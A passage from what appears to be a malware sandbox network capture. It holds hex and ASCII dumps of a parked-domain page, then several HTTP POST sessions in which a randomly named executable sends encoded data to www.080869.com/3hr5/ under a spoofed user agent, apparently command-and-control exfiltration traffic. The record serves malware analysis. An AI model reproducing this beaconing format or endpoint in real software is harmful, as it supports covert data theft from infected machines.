                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_nzshTYzreklKPSwZ6nwPWlmXy8J2H8rwO3/YgFGxxcZLT94PHxihoa2a4iwu/VzanAuVhUhltkGELOklLD9C8w==
                                                                                                                              last-modified: Mon, 04 Dec 2023 14:24:29 GMT
                                                                                                                              x-cache-miss-from: parking-698fb476bf-xqxcz
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 6e 7a 73 68 54 59 7a 72 65 6b 6c 4b 50 53 77 5a 36 6e 77 50 57 6c 6d 58 79 38 4a 32 48 38 72 77 4f 33 2f 59 67 46 47 78 78 63 5a 4c 54 39 34 50 48 78 69 68 6f 61 32 61 34 69 77 75 2f 56 7a 61 6e 41 75 56 68 55 68 6c 74 6b 47 45 4c 4f 6b 6c 4c 44 39 43 38 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 73 6c 69 6d 6e 74 68 69 6e 61 75 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 73 6c 69 6d 6e 74 68 69 6e 61 75 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 73 6c 69 6d 6e 74 68 69 6e 61 75 2e 63 6f 6d 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20
                                                                                                                              Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_nzshTYzreklKPSwZ6nwPWlmXy8J2H8rwO3/YgFGxxcZLT94PHxihoa2a4iwu/VzanAuVhUhltkGELOklLD9C8w==><head><meta charset="utf-8"><title>slimnthinau.com&nbsp;-&nbsp;slimnthinau Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="slimnthinau.com is your first and best source for all of the information youre looking for. From
                                                                                                                              Dec 4, 2023 15:24:29.579822063 CET1340INData Raw: 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 73 6c 69 6d 6e 74 68 69 6e 61 75 2e 63 6f 6d 20 68 61 73 20
                                                                                                                              Data Ascii: general topics to more of what you would expect to find here, slimnthinau.com has it all. We hope you findAEC what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logo
                                                                                                                              Dec 4, 2023 15:24:29.579911947 CET1340INData Raw: 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d 30 2e 35 65 6d 7d 61 75 64 69 6f 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61
                                                                                                                              Data Ascii: lign:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font
                                                                                                                              Dec 4, 2023 15:24:29.580044985 CET1340INData Raw: 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74
                                                                                                                              Data Ascii: -appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#313131;text-align:center;padding:0 5px}.announcement p{color
                                                                                                                              Dec 4, 2023 15:24:29.580128908 CET1340INData Raw: 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 69 6d 61 67 65 7b 63 6f 6e 74 65 6e 74 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69
                                                                                                                              Data Ascii: y:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-e
                                                                                                                              Dec 4, 2023 15:24:29.580197096 CET1340INData Raw: 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 7b 74
                                                                                                                              Data Ascii: chive-block__list-element-link:focus{text-decoration:underline}.container-buybox{text-align:center}.container-buybox__content-buybox{display:inline-block;text-align:left}.container-buybox__content-heading{font-size:15px}.container-buybox__cont
                                                                                                                              Dec 4, 2023 15:24:29.580279112 CET1340INData Raw: 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d
                                                                                                                              Data Ascii: ntent{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10px;color:#949494}.container-privacyPolicy{text-align:center}.container-privacyPolicy__content{display:inline-block}.container-privac
                                                                                                                              Dec 4, 2023 15:24:29.580342054 CET1340INData Raw: 5f 63 6f 6e 74 65 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 69 6e 69 74 69 61 6c 3b 6d 61 72 67 69 6e 3a 31 30 25 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 34 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 64 69 73 70 6c 61 79 3a 69
                                                                                                                              Data Ascii: _content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-modal-window__content-text{line-height:1.5em}.cookie-modal-window__close{width:100%;margin:0}.cookie-modal-window__content-bo
                                                                                                                              Dec 4, 2023 15:24:29.580419064 CET975INData Raw: 63 6f 6e 64 61 72 79 2d 73 6d 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a
                                                                                                                              Data Ascii: condary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;height:0}.switch{position:relative;display:inline-block;width:60px;height:34px}.switch__slider{position:absolute;cursor
                                                                                                                              Dec 4, 2023 15:24:29.580481052 CET1340INData Raw: 41 45 43 0d 0a 72 69 66 7d 62 6f 64 79 2e 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 2d 65 6e 61 62 6c 65 64 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6f 6f 74 65 72 7b 70 61 64 64 69 6e
                                                                                                                              Data Ascii: AECrif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;padding-right:5%;padding-bottom:10px} </style><script type="text/javascript"> var dto = {"uiOptimize":true,"singleDomainN
                                                                                                                              Dec 4, 2023 15:24:29.763026953 CET1340INData Raw: 35 30 61 47 6c 75 59 58 55 75 59 32 39 74 4e 6a 55 32 5a 47 55 78 4d 57 51 33 4d 7a 59 34 59 7a 59 75 4d 7a 49 31 4e 44 55 31 4e 6a 63 6d 64 47 46 7a 61 7a 31 7a 5a 57 46 79 59 32 67 6d 5a 47 39 74 59 57 6c 75 50 58 4e 73 61 57 31 75 64 47 68 70
                                                                                                                              Data Ascii: 50aGluYXUuY29tNjU2ZGUxMWQ3MzY4YzYuMzI1NDU1NjcmdGFzaz1zZWFyY2gmZG9tYWluPXNsaW1udGhpbmF1LmNvbSZhX2lkPTMmc2Vzc2lvbj1sWkhib2ljczNaTkY3cDFZSzdnbw==","postActionParameter":{"feedback":"/search/fb.php?ses=","token":{"pageLoaded":"c84007cc424008c80170


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              29192.168.11.2050160104.232.106.165808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:24:35.373198986 CET795OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.080869.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.080869.com
                                                                                                                              Referer: http://www.080869.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 66 49 61 33 55 54 5a 33 78 36 71 4e 53 78 62 5a 5a 33 4d 41 6f 4f 61 64 56 4b 67 74 58 46 42 61 59 65 6c 5a 74 70 74 6e 6f 39 4f 6e 71 41 79 75 59 71 6f 59 67 72 6a 55 36 35 36 67 6c 42 67 57 57 42 4c 35 32 72 30 7a 41 73 70 52 4c 2b 73 74 37 57 33 39 4f 6c 41 6f 37 35 58 6d 64 6c 61 35 68 63 44 63 49 4d 36 6a 46 33 33 38 78 39 4d 66 46 37 46 30 44 73 33 32 6f 46 44 61 63 6a 4c 57 42 4c 55 6a 73 50 77 59 67 41 4e 7a 4c 74 62 44 58 64 68 64 66 75 70 34 78 73 4e 68 4e 6a 39 4e 34 62 41 37 36 34 45 2f 4d 5a 6e 5a 74 47 65 7a 75 41 3d 3d
                                                                                                                              Data Ascii: TZd=fIa3UTZ3x6qNSxbZZ3MAoOadVKgtXFBaYelZtptno9OnqAyuYqoYgrjU656glBgWWBL52r0zAspRL+st7W39OlAo75Xmdla5hcDcIM6jF338x9MfF7F0Ds32oFDacjLWBLUjsPwYgANzLtbDXdhdfup4xsNhNj9N4bA764E/MZnZtGezuA==
                                                                                                                              Dec 4, 2023 15:24:35.538484097 CET452INHTTP/1.1 301 Moved Permanently
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 04 Dec 2023 14:24:56 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 162
                                                                                                                              Connection: close
                                                                                                                              Location: https://www.080869.com/3hr5/
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              30192.168.11.2050161104.232.106.165808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:24:38.061120987 CET1135OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.080869.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.080869.com
                                                                                                                              Referer: http://www.080869.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 66 49 61 33 55 54 5a 33 78 36 71 4e 53 52 72 5a 4b 6d 4d 41 6a 4f 61 65 61 71 67 74 64 6c 42 65 59 65 70 5a 74 72 41 2f 6f 50 61 6e 70 67 69 75 5a 6f 41 59 73 4c 6a 55 79 5a 36 6c 36 52 67 64 57 42 32 61 32 70 67 7a 41 6f 42 52 45 74 6b 74 72 32 33 38 47 46 41 72 72 70 58 6e 4b 31 62 30 68 63 4f 33 49 4f 47 6a 46 48 62 38 77 37 51 66 57 65 78 37 51 38 33 38 35 56 43 4d 56 44 4c 55 42 4c 70 57 73 4c 77 49 68 7a 52 7a 53 4f 6a 44 57 64 68 61 47 75 70 69 39 4d 4d 55 4c 42 4d 6c 31 64 45 41 75 59 38 50 4b 4b 57 39 6b 47 76 72 35 61 59 7a 32 2f 54 33 53 77 63 71 33 53 55 39 46 78 6f 6a 78 4f 38 46 72 6c 78 39 69 58 41 51 30 4d 55 58 5a 4d 79 49 78 6e 4e 45 38 7a 32 70 2f 33 6a 61 70 38 39 4a 39 4a 42 50 6d 76 44 74 6e 34 42 65 73 58 68 44 52 54 41 66 58 2b 42 65 67 2f 32 57 47 55 32 54 66 5a 36 58 31 77 34 37 45 45 6c 58 78 78 50 73 6d 69 6e 31 57 4f 6f 68 55 63 4d 30 2f 76 77 6a 6b 73 48 66 39 53 7a 64 47 36 6b 4c 4f 6d 37 63 76 4c 61 4a 5a 51 31 6b 56 6b 34 46 6c 44 7a 63 44 56 36 67 4a 55 6d 54 65 64 4d 79 7a 56 51 57 79 33 65 50 45 61 35 33 5a 73 66 74 51 6a 4d 73 30 51 48 62 4b 2f 30 6c 49 44 45 4b 32 64 6f 52 61 74 66 47 66 6a 43 4f 67 2f 4a 64 6f 70 47 31 67 56 30 62 32 50 70 2b 55 71 38 53 6a 37 75 65 41 56 6b 74 32 56 6b 4b 4f 6a 66 68 57 79 67 45 5a 39 78 4b 4f 65 53 72 6e 47 6c 63 47 61 62 76 4c 48 48 5a 47 61 5a 72 70 52 68 53 32 50 69 33 38 64 58 2f 62 56 6b 54 41 72 42 35 6d 6e 64 67 4b 43 39 38 51 4e 4d 66 39 49 34 56 71 6d 61 6c 72 30 79 72 47 52 63 54 42 49 32 59 4a 69 38 64 77 67 45 48 71 67 61 44 79 6a 79 73 44 53 73 3d
                                                                                                                              Data Ascii: TZd=fIa3UTZ3x6qNSRrZKmMAjOaeaqgtdlBeYepZtrA/oPanpgiuZoAYsLjUyZ6l6RgdWB2a2pgzAoBREtktr238GFArrpXnK1b0hcO3IOGjFHb8w7QfWex7Q8385VCMVDLUBLpWsLwIhzRzSOjDWdhaGupi9MMULBMl1dEAuY8PKKW9kGvr5aYz2/T3Swcq3SU9FxojxO8Frlx9iXAQ0MUXZMyIxnNE8z2p/3jap89J9JBPmvDtn4BesXhDRTAfX+Beg/2WGU2TfZ6X1w47EElXxxPsmin1WOohUcM0/vwjksHf9SzdG6kLOm7cvLaJZQ1kVk4FlDzcDV6gJUmTedMyzVQWy3ePEa53ZsftQjMs0QHbK/0lIDEK2doRatfGfjCOg/JdopG1gV0b2Pp+Uq8Sj7ueAVkt2VkKOjfhWygEZ9xKOeSrnGlcGabvLHHZGaZrpRhS2Pi38dX/bVkTArB5mndgKC98QNMf9I4Vqmalr0yrGRcTBI2YJi8dwgEHqgaDyjysDSs=
                                                                                                                              Dec 4, 2023 15:24:38.226319075 CET452INHTTP/1.1 301 Moved Permanently
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 04 Dec 2023 14:24:59 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 162
                                                                                                                              Connection: close
                                                                                                                              Location: https://www.080869.com/3hr5/
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              31192.168.11.2050162104.232.106.165808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:24:40.749059916 CET1340OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.080869.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.080869.com
                                                                                                                              Referer: http://www.080869.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 66 49 61 33 55 54 5a 33 78 36 71 4e 53 52 72 5a 4b 6d 4d 41 6a 4f 61 65 61 71 67 74 64 6c 42 65 59 65 70 5a 74 72 41 2f 6f 4f 69 6e 71 53 61 75 59 4a 41 59 74 4c 6a 55 38 35 36 6b 36 52 67 36 57 42 75 47 32 70 38 6a 41 75 46 52 45 38 30 74 72 6a 62 38 51 56 41 71 33 5a 58 6c 64 6c 62 67 68 63 44 2b 49 4f 53 7a 46 33 76 38 78 35 49 66 55 64 5a 30 4d 38 33 32 35 56 44 65 59 6a 4c 6d 42 4c 64 47 73 4f 6f 49 68 78 6c 7a 52 63 72 44 55 4f 5a 61 63 75 70 6a 6d 38 4d 68 43 68 4d 41 31 64 34 55 75 59 38 31 4b 4c 69 39 6b 46 4c 72 32 37 59 77 32 66 54 33 66 51 64 38 67 43 59 35 46 79 63 37 78 4f 49 46 72 6e 78 39 6a 33 41 51 78 6f 41 55 4a 38 7a 4e 31 6e 4d 53 32 54 4b 68 2f 32 44 6b 70 39 5a 4a 38 36 39 50 6e 63 72 74 6d 61 70 65 33 58 68 42 4d 44 41 79 65 65 41 46 67 37 53 67 47 58 2b 6c 66 5a 65 58 30 56 4d 37 53 31 6c 51 32 52 50 71 70 43 6e 6b 62 75 6c 31 55 63 64 74 2f 76 77 7a 6b 74 44 66 39 68 37 64 42 4c 6b 4b 62 32 37 48 69 72 62 52 58 41 35 75 56 69 63 4e 6c 47 7a 32 44 58 57 67 4a 30 6d 54 56 61 67 31 35 6c 51 72 76 6e 66 51 4a 36 35 65 5a 73 54 78 51 68 67 38 7a 6a 44 62 4c 4f 45 6c 4d 54 45 4c 39 64 6f 64 44 39 66 41 62 6a 43 4f 67 2f 56 76 6f 70 36 31 6a 6b 4d 62 35 59 6c 2b 52 34 55 53 6b 4c 75 59 41 56 6b 34 32 56 59 35 4f 6a 47 41 57 7a 51 69 5a 37 52 4b 4e 4d 36 72 6b 48 6c 66 43 71 62 71 50 48 48 30 4c 36 46 46 70 56 35 4b 32 50 7a 56 38 76 54 2f 61 52 41 54 58 4c 42 34 74 6e 64 6e 64 79 39 6d 42 64 78 47 39 49 6b 76 71 6e 2b 31 72 79 53 72 4b 67 74 4e 63 4d 6d 52 4b 42 49 4b 2f 41 4d 32 31 44 61 79 6f 77 6d 52 41 79 42 73 5a 6a 36 5a 4e 6a 2f 42 76 47 74 6f 61 76 65 53 73 56 73 6e 75 32 31 59 6c 6b 32 41 4e 6c 36 69 61 75 71 38 75 2b 69 6c 67 33 5a 31 39 7a 6e 4c 46 54 59 37 57 76 53 7a 39 44 6b 41 7a 4a 74 58 72 49 33 34 2b 36 70 45 52 52 7a 78 4f 75 73 78 63 42 34 77 51 42 67 4e 55 46 57 6c 79 58 4a 62 45 6a 4e 6c 59 2b 6e 69 77 55 73 72 51 49 33 45 69 39 52 33 6f 4e 39 77 41 70 48 6d 75 30 4c 7a 34 66 7a 49 6a 36 35 74 42 43 6c 6a 45 66 63 79 73 53 2b 2f 54 53 38 69 33 56 34 47 53 59 55 38 46 6e 75 70 6c 70 56 61 34 41 61 51 49 4a 77 48 6b 4a 39 6c 57 6e 48 64 73 42 6f 54 33 72 35 4e 5a 36 32 63 2f 38 61 4a 4e 33 46
                                                                                                                              Data Ascii: TZd=fIa3UTZ3x6qNSRrZKmMAjOaeaqgtdlBeYepZtrA/oOinqSauYJAYtLjU856k6Rg6WBuG2p8jAuFRE80trjb8QVAq3ZXldlbghcD+IOSzF3v8x5IfUdZ0M8325VDeYjLmBLdGsOoIhxlzRcrDUOZacupjm8MhChMA1d4UuY81KLi9kFLr27Yw2fT3fQd8gCY5Fyc7xOIFrnx9j3AQxoAUJ8zN1nMS2TKh/2Dkp9ZJ869Pncrtmape3XhBMDAyeeAFg7SgGX+lfZeX0VM7S1lQ2RPqpCnkbul1Ucdt/vwzktDf9h7dBLkKb27HirbRXA5uVicNlGz2DXWgJ0mTVag15lQrvnfQJ65eZsTxQhg8zjDbLOElMTEL9dodD9fAbjCOg/Vvop61jkMb5Yl+R4USkLuYAVk42VY5OjGAWzQiZ7RKNM6rkHlfCqbqPHH0L6FFpV5K2PzV8vT/aRATXLB4tndndy9mBdxG9Ikvqn+1rySrKgtNcMmRKBIK/AM21DayowmRAyBsZj6ZNj/BvGtoaveSsVsnu21Ylk2ANl6iauq8u+ilg3Z19znLFTY7WvSz9DkAzJtXrI34+6pERRzxOusxcB4wQBgNUFWlyXJbEjNlY+niwUsrQI3Ei9R3oN9wApHmu0Lz4fzIj65tBCljEfcysS+/TS8i3V4GSYU8FnuplpVa4AaQIJwHkJ9lWnHdsBoT3r5NZ62c/8aJN3F
                                                                                                                              Dec 4, 2023 15:24:40.749176025 CET11628OUTData Raw: 4b 74 4a 46 50 47 79 66 4a 39 53 57 65 2f 34 4e 6c 67 77 39 37 47 61 47 50 77 69 67 79 47 39 2b 6e 36 59 52 70 4a 52 47 6e 64 5a 6f 52 73 70 41 76 52 71 59 76 55 62 6d 63 76 76 4a 7a 2b 51 42 4e 36 53 4a 36 41 68 6f 58 43 5a 34 44 79 67 6f 57 56
                                                                                                                              Data Ascii: KtJFPGyfJ9SWe/4Nlgw97GaGPwigyG9+n6YRpJRGndZoRspAvRqYvUbmcvvJz+QBN6SJ6AhoXCZ4DygoWVSfClF9dusWv3ar3ME7RWYq4guBV2fpeN4up6gM3oWwVKAtYX2rrFp1x+YkH3StVJOsr/B0504+zqqip4e5XtSfaALkb6RHC0TwYidRGQmnzA/j1lxLjcMjzCaTFNGqveu9/CgavYiz8lFsFm4K7S81bMAER4+8FAT
                                                                                                                              Dec 4, 2023 15:24:40.914653063 CET452INHTTP/1.1 301 Moved Permanently
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 04 Dec 2023 14:25:02 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 162
                                                                                                                              Connection: close
                                                                                                                              Location: https://www.080869.com/3hr5/
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                              Dec 4, 2023 15:24:40.914762974 CET2626OUTData Raw: 72 6d 45 47 36 62 56 4f 79 6b 78 2f 6a 41 6c 76 41 70 67 6b 65 59 6d 38 36 37 73 55 74 57 52 70 73 78 48 43 42 55 7a 63 32 68 72 50 6b 41 38 79 66 63 61 58 4f 32 4a 62 52 6e 72 71 70 38 63 4f 45 62 46 2b 57 69 50 34 66 46 4f 39 44 54 4a 64 66 6e
